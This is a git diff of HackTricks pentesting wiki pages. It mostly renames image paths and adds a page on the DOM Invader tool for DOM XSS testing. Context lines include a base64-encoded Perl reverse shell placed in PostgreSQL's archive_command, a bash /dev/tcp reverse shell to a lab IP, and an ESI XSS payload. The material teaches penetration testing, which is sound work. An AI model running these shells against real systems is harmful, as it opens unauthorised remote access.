GITBOOK-3915: change request with no subject merged in GitBook
BIN
.gitbook/assets/image (3) (1) (1) (3).png
Normal file
After Width: | Height: | Size: 18 KiB |
Before Width: | Height: | Size: 18 KiB After Width: | Height: | Size: 39 KiB |
Before Width: | Height: | Size: 39 KiB After Width: | Height: | Size: 78 KiB |
Before Width: | Height: | Size: 78 KiB After Width: | Height: | Size: 38 KiB |
BIN
.gitbook/assets/image (4) (1) (1) (1).png
Normal file
After Width: | Height: | Size: 60 KiB |
Before Width: | Height: | Size: 60 KiB After Width: | Height: | Size: 220 KiB |
Before Width: | Height: | Size: 220 KiB After Width: | Height: | Size: 329 KiB |
Before Width: | Height: | Size: 329 KiB After Width: | Height: | Size: 45 KiB |
BIN
.gitbook/assets/image (5) (1) (1) (2).png
Normal file
After Width: | Height: | Size: 53 KiB |
Before Width: | Height: | Size: 53 KiB After Width: | Height: | Size: 91 KiB |
Before Width: | Height: | Size: 91 KiB After Width: | Height: | Size: 316 KiB |
Before Width: | Height: | Size: 316 KiB After Width: | Height: | Size: 29 KiB |
|
@ -600,6 +600,7 @@
|
||||||
* [Chrome Cache to XSS](pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md)
|
* [Chrome Cache to XSS](pentesting-web/xss-cross-site-scripting/chrome-cache-to-xss.md)
|
||||||
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
|
* [Debugging Client Side JS](pentesting-web/xss-cross-site-scripting/debugging-client-side-js.md)
|
||||||
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
* [Dom Clobbering](pentesting-web/xss-cross-site-scripting/dom-clobbering.md)
|
||||||
|
* [DOM Invader](pentesting-web/xss-cross-site-scripting/dom-invader.md)
|
||||||
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
* [DOM XSS](pentesting-web/xss-cross-site-scripting/dom-xss.md)
|
||||||
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
* [Iframes in XSS, CSP and SOP](pentesting-web/xss-cross-site-scripting/iframes-in-xss-and-csp.md)
|
||||||
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
* [Misc JS Tricks & Relevant Info](pentesting-web/xss-cross-site-scripting/other-js-tricks.md)
|
||||||
|
|
|
@ -109,7 +109,7 @@ Open the SalseoLoader project using Visual Studio.
|
||||||
|
|
||||||
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
#### **Search for DllExport package (using Browse tab), and press Install (and accept the popup)**
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (4) (1) (1).png>)
|
![](<../.gitbook/assets/image (4) (1) (1) (1).png>)
|
||||||
|
|
||||||
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
In your project folder have appeared the files: **DllExport.bat** and **DllExport\_Configure.bat**
|
||||||
|
|
||||||
|
@ -117,7 +117,7 @@ In your project folder have appeared the files: **DllExport.bat** and **DllExpor
|
||||||
|
|
||||||
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
Press **Uninstall** (yeah, its weird but trust me, it is necessary)
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (5) (1) (1).png>)
|
![](<../.gitbook/assets/image (5) (1) (1) (2).png>)
|
||||||
|
|
||||||
### **Exit Visual Studio and execute DllExport\_configure**
|
### **Exit Visual Studio and execute DllExport\_configure**
|
||||||
|
|
||||||
|
|
|
@ -76,7 +76,7 @@ fat_magic FAT_MAGIC
|
||||||
|
|
||||||
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
or using the [Mach-O View](https://sourceforge.net/projects/machoview/) tool:
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
||||||
|
|
||||||
|
@ -127,7 +127,7 @@ MH_MAGIC_64 ARM64 E USR00 EXECUTE 19 1728 NOUNDEFS DY
|
||||||
|
|
||||||
Or using [Mach-O View](https://sourceforge.net/projects/machoview/):
|
Or using [Mach-O View](https://sourceforge.net/projects/machoview/):
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
## **Mach-O Load commands**
|
## **Mach-O Load commands**
|
||||||
|
|
||||||
|
@ -203,7 +203,7 @@ Example of **section header**:
|
||||||
|
|
||||||
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
If you **add** the **section offset** (0x37DC) + the **offset** where the **arch starts**, in this case `0x18000` --> `0x37DC + 0x18000 = 0x1B7DC`
|
||||||
|
|
||||||
<figure><img src="../../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
It's also possible to get **headers information** from the **command line** with:
|
It's also possible to get **headers information** from the **command line** with:
|
||||||
|
|
||||||
|
|
|
@ -15,7 +15,7 @@ Get Access Today:
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -385,7 +385,7 @@ The **configuration file** of postgresql is **writable** by the **postgres user*
|
||||||
|
|
||||||
![](<../.gitbook/assets/image (303).png>)
|
![](<../.gitbook/assets/image (303).png>)
|
||||||
|
|
||||||
#### **RCE with ssl_passphrase_command**
|
#### **RCE with ssl\_passphrase\_command**
|
||||||
|
|
||||||
The configuration file have some interesting attributes that can lead to RCE:
|
The configuration file have some interesting attributes that can lead to RCE:
|
||||||
|
|
||||||
|
@ -409,13 +409,14 @@ While testing this I noticed that this will only work if the **private key file
|
||||||
|
|
||||||
**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
|
**More** [**information about this technique here**](https://pulsesecurity.co.nz/articles/postgres-sqli)**.**
|
||||||
|
|
||||||
#### **RCE with archive_command**
|
#### **RCE with archive\_command**
|
||||||
|
|
||||||
Another attribute in the configuration file that is exploitable is `archive_command`.
|
Another attribute in the configuration file that is exploitable is `archive_command`.
|
||||||
|
|
||||||
For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations.
|
For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations.
|
||||||
|
|
||||||
The general steps are:
|
The general steps are:
|
||||||
|
|
||||||
1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')`
|
1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')`
|
||||||
2. Overwrite `archive_command` with the payload. For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
|
2. Overwrite `archive_command` with the payload. For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'`
|
||||||
3. Reload the config: `SELECT pg_reload_conf()`
|
3. Reload the config: `SELECT pg_reload_conf()`
|
||||||
|
@ -478,7 +479,7 @@ In[ this **writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem
|
||||||
|
|
||||||
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP:
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (4) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (4) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner.
|
||||||
|
|
||||||
|
@ -542,7 +543,7 @@ RETURNS (result TEXT);
|
||||||
```
|
```
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with 
|
Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with
|
||||||
|
|
||||||
```sql
|
```sql
|
||||||
CREATE EXTENSION dblink;
|
CREATE EXTENSION dblink;
|
||||||
|
@ -567,7 +568,7 @@ SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2;
|
||||||
|
|
||||||
### **Custom defined function with** SECURITY DEFINER
|
### **Custom defined function with** SECURITY DEFINER
|
||||||
|
|
||||||
****[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
|
\*\*\*\*[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**:
|
||||||
|
|
||||||
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
|
<pre class="language-sql"><code class="lang-sql">CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
|
||||||
RETURNS text
|
RETURNS text
|
||||||
|
@ -665,7 +666,7 @@ The **password-based** authentication methods are **md5**, **crypt**, and **pass
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
|
@ -40,7 +40,7 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
|
||||||
* Save changes
|
* Save changes
|
||||||
* Get the generated WebHook URL:
|
* Get the generated WebHook URL:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
* Call it with curl and you shuold receive the rev shell
|
* Call it with curl and you shuold receive the rev shell
|
||||||
|
|
||||||
|
|
|
@ -100,7 +100,7 @@ Then, the attacker could use those **100 connections** to perform a **search bru
|
||||||
|
|
||||||
Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
|
Yes, it's possible to generate 100000 temporary files in an EC2 medium size instance:
|
||||||
|
|
||||||
<figure><img src="../../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../../.gitbook/assets/image (3) (1) (1) (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
{% hint style="warning" %}
|
{% hint style="warning" %}
|
||||||
Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.
|
Note that in order to trigger the timeout it would be **enough to include the vulnerable LFI page**, so it enters in an eternal include loop.
|
||||||
|
|
|
@ -7,7 +7,7 @@
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
@ -206,7 +206,7 @@ The following will add a `Location` header to the response
|
||||||
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->
|
||||||
```
|
```
|
||||||
|
|
||||||
<figure><img src="../.gitbook/assets/image (5) (1).png" alt=""><figcaption></figcaption></figure>
|
<figure><img src="../.gitbook/assets/image (5) (1) (1).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
#### CRLF in Add header (**CVE-2019-2438)**
|
#### CRLF in Add header (**CVE-2019-2438)**
|
||||||
|
|
||||||
|
@ -265,7 +265,7 @@ Check the XSLT page:
|
||||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
111
pentesting-web/xss-cross-site-scripting/dom-invader.md
Normal file
|
@ -0,0 +1,111 @@
|
||||||
|
# DOM Invader
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|
||||||
|
|
||||||
|
## DOM Invader
|
||||||
|
|
||||||
|
DOM Invader is a browser tool installed in Burp's inbuilt browser. It assists in **detecting DOM XSS vulnerabilities** using various sources and sinks, including web messages and prototype pollution. The tool is preinstalled as an extension.
|
||||||
|
|
||||||
|
DOM Invader integrates a tab within the browser's DevTools panel enabling the following:
|
||||||
|
|
||||||
|
1. **Identification of controllable sinks** on a webpage for DOM XSS testing, providing context and sanitization details.
|
||||||
|
2. **Logging, editing, and resending web messages** sent via the `postMessage()` method for DOM XSS testing. DOM Invader can also auto-detect vulnerabilities using specially crafted web messages.
|
||||||
|
3. Detection of **client-side prototype pollution** sources and scanning of controllable gadgets sent to risky sinks.
|
||||||
|
4. Identification of **DOM clobbering vulnerabilities**.
|
||||||
|
|
||||||
|
### Enable It
|
||||||
|
|
||||||
|
In the Burp's builtin browser go to the **Burp extension** and enable it:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (4).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Noe refresh the page and in the **Dev Tools** you will find the **DOM Invader tab:**
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (3).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
### Inject a Canary
|
||||||
|
|
||||||
|
In the previous image you can see a **random group of chars, that is the Canary**. You should now start **injecting** it in different parts of the web (params, forms, url...) and each time click search it. DOM Invader will check if the **canary ended in any interesting sink** that could be exploited.
|
||||||
|
|
||||||
|
Moreover, the options **Inject URL params** and Inject forms will automatically open a **new tab** **injecting** the **canary** in every **URL** param and **form** it finds.
|
||||||
|
|
||||||
|
### Inject an empty Canary
|
||||||
|
|
||||||
|
If you just want to find potential sinks the page might have, even if they aren't exploitable, you can **search for an empty canary**.
|
||||||
|
|
||||||
|
### Post Messages
|
||||||
|
|
||||||
|
DOM Invader allows testing for DOM XSS using web messages with features such as:
|
||||||
|
|
||||||
|
1. **Logging web messages** sent via `postMessage()`, akin to Burp Proxy's HTTP request/response history logging.
|
||||||
|
2. **Modification** and **reissue** of web messages to manually test for DOM XSS, similar to Burp Repeater's function.
|
||||||
|
3. **Automatic alteration** and sending of web messages for probing DOM XSS.
|
||||||
|
|
||||||
|
#### Message details
|
||||||
|
|
||||||
|
You can click each message to view more detailed information about it, including whether the `origin`, `data`, or `source` properties of the message are accessed by the client-side JavaScript.
|
||||||
|
|
||||||
|
* **`origin`** : If the **origin information of the message is not check**, you may be able to send cross-origin messages to the event handler **from an arbitrary external domain**. But if it's checked it still could be insecure.
|
||||||
|
* **`data`**: This is where the payload is sent. If this data is not used, the sink is useless.
|
||||||
|
* **`source`**: Evaluates if the source property, usually referencing an iframe, is validated instead of the origin. Even if this is checked, it doesn't assure the validation can't be bypassed.
|
||||||
|
|
||||||
|
#### Reply a message
|
||||||
|
|
||||||
|
1. From the **Messages** view, click on any message to open the message details dialog.
|
||||||
|
2. Edit the **Data** field as required.
|
||||||
|
3. Click **Send**.
|
||||||
|
|
||||||
|
### Prototype Pollution
|
||||||
|
|
||||||
|
DOM Invader can also search for **Prototype Pollution vulnerabilities**. First, you need to enable it:
|
||||||
|
|
||||||
|
<figure><img src="../../.gitbook/assets/image (5).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
Then, it will **search for sources** that enable you to add arbitrary properties to the **`Object.prototype`**.
|
||||||
|
|
||||||
|
If anything is found a **Test** button will appear to **test the found source**. Click on it, a new tab will appear, create an object in the console and check if the `testproperty` exists:
|
||||||
|
|
||||||
|
```javascript
|
||||||
|
let b = {}
|
||||||
|
b.testproperty
|
||||||
|
```
|
||||||
|
|
||||||
|
Once you found a source you can **scan for a gadget**:
|
||||||
|
|
||||||
|
1. From the **DOM** view, click the **Scan for gadgets** button next to any prototype pollution source that DOM Invader has found. DOM Invader opens a new tab and starts scanning for suitable gadgets.
|
||||||
|
2. In the same tab, open the **DOM Invader** tab in the DevTools panel. Once the scan is finished, the **DOM** view displays any sinks that DOM Invader was able to access via the identified gadgets. In the example below, a gadget property called `html` was passed to the `innerHTML` sink.
|
||||||
|
|
||||||
|
## DOM clobbering
|
||||||
|
|
||||||
|
In the previous image it's possible to see that DOM clobbering scan can be turned on. Once done, **DOM Invader will start searching for DOM clobbering vulnerabilities**.
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader](https://portswigger.net/burp/documentation/desktop/tools/dom-invader)
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/enabling)
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-xss](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-xss)
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/web-messages](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/web-messages)
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/prototype-pollution)
|
||||||
|
* [https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering](https://portswigger.net/burp/documentation/desktop/tools/dom-invader/dom-clobbering)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
